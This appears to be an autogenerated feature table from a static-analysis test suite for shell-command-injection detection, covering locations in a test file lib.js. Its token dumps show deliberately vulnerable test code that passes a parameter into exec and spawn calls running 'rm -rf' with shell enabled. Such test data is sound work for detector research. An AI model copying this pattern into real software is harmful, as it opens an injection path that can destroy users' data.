module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:1:414:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:1:414:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:1:414:26 | module. ... lOption | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:1:414:26 | module. ... lOption | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:1:414:26 | module. ... lOption | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:1:429:1 | module. ... ild`.\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:1:429:1 | module. ... ild`.\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:1:429:1 | module. ... ild`.\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:8:414:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:8:414:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:8:414:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:16:414:26 | shellOption | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:16:414:26 | shellOption | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:16:414:26 | shellOption | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | build | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | build | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | build | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | build | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | build | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | cp | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | cp | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | spawn | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | spawn | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | this | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | this | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:414:29 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | 'arguments' object of anonymous function | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | exceptional return of anonymous function | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | functio ... ild`.\\n} | assignedToPropName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | functio ... ild`.\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | functio ... ild`.\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | functio ... ild`.\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | return of anonymous function | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:30:429:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:40:414:43 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:40:414:43 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:40:414:43 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:40:414:43 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:40:414:43 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:40:414:43 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:40:414:43 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:40:414:43 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:40:414:43 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:414:40:414:43 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:3 | cp | contextFunctionInterfaces | 